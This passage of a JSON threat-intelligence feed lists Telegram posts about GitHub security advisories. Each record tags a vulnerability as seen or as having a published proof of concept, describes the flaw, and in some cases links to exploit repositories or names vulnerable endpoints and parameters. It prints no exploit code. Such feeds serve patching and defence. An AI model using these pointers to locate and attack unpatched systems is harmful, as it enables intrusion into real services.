"GHSA-4JCV-VP96-94XR", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/791", "content": "#exploit\n1. CVE-2024-7954:\nUnauth RCE in SPIP\nhttps://github.com/Chocapikk/CVE-2024-7954\n\n2. CVE-2024-0692:\nSolarWinds Security Event Manager AMF deserialization RCE\nhttps://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692\n\n3. CVE-2024-24759:\nBypass SSRF Protection with DNS Rebinding\nhttps://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr", "creation_timestamp": "2024-09-09T14:49:02.000000Z"}, {"uuid": "70da696b-4c9b-46c2-a943-0362af5a5535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GRX-V727-QMQ6", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/592", "content": "#exploit\n1. CVE-2024-40348:\nUnauth directory traversal in Bazaar 1.4.3\nhttps://github.com/bigb0x/CVE-2024-40348\n\n2. CVE-2024-39907:\nSQLi in Linux 1Panel\nhttps://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6", "creation_timestamp": "2024-07-26T05:11:20.000000Z"}, {"uuid": "e9f56e8d-78f5-4fa5-a115-9a7ae6115242", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7PG-V2C8-MFG3", "type": "seen", "source": "https://t.me/ton618cyber/5297", "content": "#news\n\nhttps://github.com/advisories/GHSA-r7pg-v2c8-mfg3\nA critical vulnerability, CVE-2024-47561, has been identified in the Apache Avro Java SDK, affecting all versions up to and including 1.11.3. This vulnerability allows an attacker to execute arbitrary code on systems parsing Avro data via a specially crafted schema. The root of the issue lies in the deserialization of untrusted data, a common flaw that can lead to remote code execution (RCE). This flaw could be exploited if an application processes malicious Avro schemas, potentially compromising the system entirely.\n\nThe vulnerability was discovered by Kostya Kortchinsky from the Databricks Security Team. Exploits could be launched through frameworks like Kafka or other data pipeline technologies relying on Avro schemas. Although no public proof-of-concept (PoC) has been released yet, this vulnerability poses a serious threat, especially to systems that allow users to upload or provide their own Avro schemas for parsing.\n\nMitigation steps include upgrading to version 1.11.4 or later, which patches the vulnerability, as well as employing schema sanitization and avoiding user-provided schemas wherever possible. It's essential that organizations prioritize patching to avoid security risks", "creation_timestamp": "2024-10-08T16:18:57.000000Z"}, {"uuid": "4d6c0866-33af-4742-869f-8c082a8c56c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G9GF-G5JQ-9H3V", "type": "seen", "source": "https://t.me/TheDarkWebInformer/10859", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-g9gf-g5jq-9h3v\n\ud83d\udd25 CVSS Score: 9.1 (CVSS_V3)\n\ud83d\udd39 Description: SSRF vulnerability in Edit Service Page of Apache Ranger UI in Apache Ranger Version 2.4.0.\nUsers are recommended to upgrade to version Apache Ranger 2.5.0, which fixes this issue.\n\ud83d\udccf Published: 2025-01-22T00:33:36Z\n\ud83d\udccf Modified: 2025-01-27T22:57:20Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-45479\n2. https://cwiki.apache.org/confluence/display/RANGER/Vulnerabilities+found+in+Ranger\n3. https://github.com/apache/ranger\n4. http://www.openwall.com/lists/oss-security/2025/01/21/4", "creation_timestamp": "2025-01-28T00:50:52.000000Z"}, {"uuid": "2e64fdf2-89cf-4f5d-8f51-28dcd2f2052e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/16205", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32433\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.\n\ud83d\udccf Published: 2025-04-16T21:34:37.457Z\n\ud83d\udccf Modified: 2025-04-16T22:03:46.067Z\n\ud83d\udd17 References:\n1. https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\n2. https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12\n3. https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f\n4. https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891", "creation_timestamp": "2025-04-17T20:16:20.000000Z"}, {"uuid": "40912b37-5a84-40ee-a4ed-dab99a93caac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HRVQ-3565-FQ43", "type": "seen", "source": "https://t.me/arpsyndicate/3330", "content": "#ExploitObserverAlert\n\nGHSA-hrvq-3565-fq43\n\nDESCRIPTION: Exploit Observer has 7 entries in 2 file formats related to GHSA-hrvq-3565-fq43. The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user.", "creation_timestamp": "2024-01-29T09:54:35.000000Z"}, {"uuid": "0a9ab6ab-5de3-4aee-913b-a1102e2124f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQCX-CCGC-XWHV", "type": "published-proof-of-concept", "source": "Telegram/1tvljGnqs_gH8ptwRWquPXQ1OnfnrYfZMfH5i0z8ghp7WA", "content": "", "creation_timestamp": "2024-04-07T21:44:40.000000Z"}, {"uuid": "8021c982-28c9-4f9a-aef0-afa05fc1fd11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQCX-CCGC-XWHV", "type": "published-proof-of-concept", "source": "Telegram/T8RrVhYocnMnDFdZe3eZtaiEF5y3WBd0rlqr1qdZzfHfTA", "content": "", "creation_timestamp": "2024-04-05T23:16:33.000000Z"}, {"uuid": "eca2efb9-0e84-4789-b420-886b29dfd9de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47G8-Q2W5-X9JM", "type": "seen", "source": "https://t.me/arpsyndicate/3302", "content": "#ExploitObserverAlert\n\nGHSA-47g8-q2w5-x9jm\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-47g8-q2w5-x9jm. The Paid Memberships Pro \u2013 Content Restriction, User Registration, &amp; Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", "creation_timestamp": "2024-01-28T14:10:21.000000Z"}, {"uuid": "884ce188-efe2-42a9-9191-8a1aef61f90e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P72Q-H37J-3HQ7", "type": "seen", "source": "https://t.me/arpsyndicate/4756", "content": "#ExploitObserverAlert\n\nGHSA-p72q-h37j-3hq7\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-p72q-h37j-3hq7. dbt uses a SQLparse version with a high vulnerability\n\nARPS-PRIORITY: 0.7270876", "creation_timestamp": "2024-04-23T18:16:49.000000Z"}, {"uuid": "1305f4eb-7e7e-4bcf-8e55-c4b405a2f145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R84P-88G2-2VX2", "type": "seen", "source": "https://t.me/arpsyndicate/4166", "content": "#ExploitObserverAlert\n\nGHSA-r84p-88g2-2vx2\n\nDESCRIPTION: Exploit Observer has 33 entries in 9 file formats related to GHSA-r84p-88g2-2vx2. Apache Tomcat EncryptInterceptor error leads to Uncontrolled Resource Consumption", "creation_timestamp": "2024-03-12T23:36:54.000000Z"}, {"uuid": "c43d3eea-820d-458d-8b28-fcdd27557290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X6WX-5G28-FWP2", "type": "seen", "source": "https://t.me/arpsyndicate/3030", "content": "#ExploitObserverAlert\n\nGHSA-x6wx-5g28-fwp2\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-X6WX-5G28-FWP2. Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "creation_timestamp": "2024-01-26T18:16:40.000000Z"}, {"uuid": "9d602920-b59c-4a91-b232-ebe08a9fbe11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C7VF-M394-M4X4", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3782", "content": "#ExploitObserverAlert\n\nGHSA-c7vf-m394-m4x4\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-c7vf-m394-m4x4. Use of Insufficiently Random Values in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T13:51:34.000000Z"}, {"uuid": "5787de8b-a506-4172-b09c-12c9b7718479", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CRV8-R5WQ-GV2W", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4095", "content": "#ExploitObserverAlert\n\nGHSA-crv8-r5wq-gv2w\n\nDESCRIPTION: Exploit Observer has 9 entries in 6 file formats related to GHSA-crv8-r5wq-gv2w. webui-aria2 Path Traversal vulnerability", "creation_timestamp": "2024-02-29T10:11:29.000000Z"}, {"uuid": "7d33800a-8732-4f9d-9549-712c8ed5c89f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44JG-JGJX-3XG5", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4071", "content": "#ExploitObserverAlert\n\nGHSA-44jg-jgjx-3xg5\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-44jg-jgjx-3xg5. Liferay Portal's Dynamic Data Mapping module's DDMForm and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T22:07:58.000000Z"}, {"uuid": "8bb4b51e-b55c-4a80-8e6c-21347e236733", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CR36-3VQF-X5W5", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4069", "content": "#ExploitObserverAlert\n\nGHSA-cr36-3vqf-x5w5\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-cr36-3vqf-x5w5. Liferay Portal Expando module and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T22:03:54.000000Z"}, {"uuid": "627a8477-010d-440d-b645-9ae8c515101b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9JV5-WF44-8VFM", "type": "seen", "source": "https://t.me/arpsyndicate/3338", "content": "#ExploitObserverAlert\n\nGHSA-9jv5-wf44-8vfm\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-9jv5-wf44-8vfm. Jenkins Active Choices Plugin 2.4 and earlier does not escape the name and description of build parameters.", "creation_timestamp": "2024-01-29T10:14:54.000000Z"}, {"uuid": "23afcd77-bbb4-453b-891e-fab87f83c0a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J4WQ-QX9V-XVQJ", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3337", "content": "#ExploitObserverAlert\n\nGHSA-j4wq-qx9v-xvqj\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-j4wq-qx9v-xvqj. Microsoft Edge (Chromium-based) Spoofing Vulnerability", "creation_timestamp": "2024-01-29T10:12:30.000000Z"}, {"uuid": "bf06d65c-837c-4aa8-a542-ccf0f5f17c65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MR56-56J8-X6R4", "type": "seen", "source": "https://t.me/arpsyndicate/3336", "content": "#ExploitObserverAlert\n\nGHSA-mr56-56j8-x6r4\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-mr56-56j8-x6r4. An authorization vulnerability exists in GitLab versions 14.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. An unauthorized attacker is able to assign arbitrary users to MRs that they created within the project", "creation_timestamp": "2024-01-29T10:10:07.000000Z"}, {"uuid": "f5368ec5-1d28-45ae-8fc5-2e5a9f3110b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CRVX-W25M-8X7C", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3206", "content": "#ExploitObserverAlert\n\nGHSA-crvx-w25m-8x7c\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-crvx-w25m-8x7c. Improper Input Validation in Hitron Systems DVR HVR-4781 1.03~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW.", "creation_timestamp": "2024-01-28T04:35:47.000000Z"}, {"uuid": "2662e796-b194-4b99-a949-a22fc671a11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PXVC-5JRX-H52P", "type": "seen", "source": "https://t.me/arpsyndicate/3339", "content": "#ExploitObserverAlert\n\nGHSA-pxvc-5jrx-h52p\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-pxvc-5jrx-h52p. A vulnerability has been found in Beijing Baichuo Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", "creation_timestamp": "2024-01-29T10:16:39.000000Z"}, {"uuid": "0fcff666-58fd-4352-9080-ca93451e90d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-988V-V47J-CJ4P", "type": "seen", "source": "https://t.me/arpsyndicate/3333", "content": "#ExploitObserverAlert\n\nGHSA-988v-v47j-cj4p\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-988v-v47j-cj4p. A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", "creation_timestamp": "2024-01-29T10:04:25.000000Z"}, {"uuid": "29480eb4-3c4a-49aa-b22a-047b513f8dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VH6-QFV6-VCQP", "type": "seen", "source": "https://t.me/arpsyndicate/3332", "content": "#ExploitObserverAlert\n\nGHSA-9vh6-qfv6-vcqp\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-9vh6-qfv6-vcqp. Snipe-IT is a free, open-source IT asset/license management systemIn Snipe-IT, versions v3.0-alpha to v5.3.7 are vulnerable to Host Header Injection. By sending a specially crafted host header in the reset password request, it is possible to send password reset links to users which once clicked lead to an attacker controlled server and thus leading to password reset token leak. This can lead to account take over.", "creation_timestamp": "2024-01-29T10:00:36.000000Z"}, {"uuid": "6c9cc992-7c57-4f9d-a487-86ead1578282", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX65-34VR-MQRJ", "type": "seen", "source": "https://t.me/arpsyndicate/3331", "content": "#ExploitObserverAlert\n\nGHSA-xx65-34vr-mqrj\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-xx65-34vr-mqrj. Improper authorization in handler for custom URL scheme issue in \"Mercari\" App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.", "creation_timestamp": "2024-01-29T09:58:55.000000Z"}, {"uuid": "7f20e689-fd33-4770-aa6f-46e0e037a1dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQJM-XCP8-WGMM", "type": "seen", "source": "https://t.me/arpsyndicate/4942", "content": "#ExploitObserverAlert\n\nGHSA-pqjm-xcp8-wgmm\n\nDESCRIPTION: Exploit Observer has 8 entries in 6 file formats related to GHSA-pqjm-xcp8-wgmm. Ez Platform and Legacy are prone to an insecure interpretation of PHP/PHAR uploads\n\nARPS-PRIORITY: 0.7050617", "creation_timestamp": "2024-05-17T21:40:01.000000Z"}, {"uuid": "e7e1593b-14e5-4317-a243-ed83a9112a21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PV96-P9PP-9M2M", "type": "seen", "source": "https://t.me/arpsyndicate/3328", "content": "#ExploitObserverAlert\n\nGHSA-pv96-p9pp-9m2m\n\nDESCRIPTION: Exploit Observer has 5 entries in 2 file formats related to GHSA-pv96-p9pp-9m2m. The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", "creation_timestamp": "2024-01-29T09:50:38.000000Z"}, {"uuid": "ab389a60-b960-4d9c-ba2c-10602af45652", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6VM-37G8-GQVH", "type": "seen", "source": "https://t.me/arpsyndicate/3327", "content": "#ExploitObserverAlert\n\nGHSA-m6vm-37g8-gqvh\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-m6vm-37g8-gqvh. Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J).  Supported versions that are affected are 8.1.0 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors.  Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).", "creation_timestamp": "2024-01-29T09:48:34.000000Z"}, {"uuid": "13fc93e9-5456-4cc0-8ed8-78ac8f8e2c9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2H4-P5J3-JCGH", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3326", "content": "#ExploitObserverAlert\n\nGHSA-c2h4-p5j3-jcgh\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-c2h4-p5j3-jcgh. A buffer overflow vulnerability exists in Symantec Data Loss Prevention version 14.0.2 and before. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted document to achieve code execution.", "creation_timestamp": "2024-01-29T09:46:26.000000Z"}, {"uuid": "d3e97c29-6283-45f8-9cfd-7178ed94a283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-965G-R5X6-G5Q2", "type": "seen", "source": "https://t.me/arpsyndicate/3325", "content": "#ExploitObserverAlert\n\nGHSA-965g-r5x6-g5q2\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-965g-r5x6-g5q2. An arbitrary firmware upload vulnerability exists in the Motorola MR2600. An attacker can exploit this vulnerability to achieve code execution on the device. Authentication is required, however can be bypassed.", "creation_timestamp": "2024-01-29T09:44:41.000000Z"}, {"uuid": "6ed22704-f039-4ca8-aa65-67e586413c4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XGFC-FHGR-XPJ4", "type": "seen", "source": "https://t.me/arpsyndicate/3324", "content": "#ExploitObserverAlert\n\nGHSA-xgfc-fhgr-xpj4\n\nDESCRIPTION: Exploit Observer has 2 entries in 1 file formats related to GHSA-xgfc-fhgr-xpj4. WhatACart v2.0.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /site/default/search.", "creation_timestamp": "2024-01-29T09:42:35.000000Z"}, {"uuid": "1c65cb23-04b5-47f2-b6d7-791690230d82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPXH-C8X5-MMG6", "type": "seen", "source": "https://t.me/arpsyndicate/3323", "content": "#ExploitObserverAlert\n\nGHSA-wpxh-c8x5-mmg6\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-wpxh-c8x5-mmg6. An issue found in Wondershare Technology Co.,Ltd PDF Reader v.1.0.1 allows a remote attacker to execute arbitrary commands via the pdfreader_setup_full13143.exe file.", "creation_timestamp": "2024-01-29T09:40:23.000000Z"}, {"uuid": "dd99daf0-c190-4df0-979a-cfadbf5135e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M2R6-996J-PVF6", "type": "seen", "source": "https://t.me/arpsyndicate/3322", "content": "#ExploitObserverAlert\n\nGHSA-m2r6-996j-pvf6\n\nDESCRIPTION: Exploit Observer has 6 entries in 2 file formats related to GHSA-m2r6-996j-pvf6. Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)", "creation_timestamp": "2024-01-29T09:35:34.000000Z"}, {"uuid": "95c26976-5a10-404f-ad05-02b56933cd70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HHQ2-9P38-JWH9", "type": "seen", "source": "https://t.me/arpsyndicate/3314", "content": "#ExploitObserverAlert\n\nGHSA-hhq2-9p38-jwh9\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-hhq2-9p38-jwh9. Improper checking of AP-S lock bit while verifying the secure resource group permissions can lead to non secure read and write access in Snapdragon Connectivity, Snapdragon Mobile", "creation_timestamp": "2024-01-29T09:17:47.000000Z"}, {"uuid": "10c42502-702b-42c5-a0fb-c1071b4e5b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J48H-6X68-4FC5", "type": "seen", "source": "https://t.me/arpsyndicate/3311", "content": "#ExploitObserverAlert\n\nGHSA-j48h-6x68-4fc5\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-j48h-6x68-4fc5. Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.", "creation_timestamp": "2024-01-29T09:09:30.000000Z"}, {"uuid": "d05444b5-92c8-4705-94af-f8685c47a44f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JWV8-G456-8JG2", "type": "seen", "source": "https://t.me/arpsyndicate/3310", "content": "#ExploitObserverAlert\n\nGHSA-jwv8-g456-8jg2\n\nDESCRIPTION: Exploit Observer has 5 entries in 2 file formats related to GHSA-jwv8-g456-8jg2. A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to bypass Privacy preferences.", "creation_timestamp": "2024-01-29T09:07:13.000000Z"}, {"uuid": "59f7c070-3096-45a2-a57d-09d078a85ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3PRP-HMJP-8QM4", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3309", "content": "#ExploitObserverAlert\n\nGHSA-3prp-hmjp-8qm4\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-3prp-hmjp-8qm4. Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability", "creation_timestamp": "2024-01-29T09:05:15.000000Z"}, {"uuid": "3d4dc1c1-aeee-4312-813e-b7a38b581ee8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q7VR-846R-64Q8", "type": "seen", "source": "https://t.me/arpsyndicate/3308", "content": "#ExploitObserverAlert\n\nGHSA-q7vr-846r-64q8\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-q7vr-846r-64q8. A vulnerability has been reported in Cups Easy (Purchase &amp; Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grndisplay.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.", "creation_timestamp": "2024-01-29T09:03:25.000000Z"}, {"uuid": "654b1428-bca5-4777-bc3f-25a361dcc825", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WFV-QG7W-F9PC", "type": "seen", "source": "https://t.me/arpsyndicate/3307", "content": "#ExploitObserverAlert\n\nGHSA-2wfv-qg7w-f9pc\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-2wfv-qg7w-f9pc. A vulnerability has been reported in Cups Easy (Purchase &amp; Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodecreate.php, in the taxcodeid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.", "creation_timestamp": "2024-01-28T14:31:51.000000Z"}, {"uuid": "ce5f088f-9bef-4cf8-b5cb-6a5a47725d61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RG4-QGV3-4987", "type": 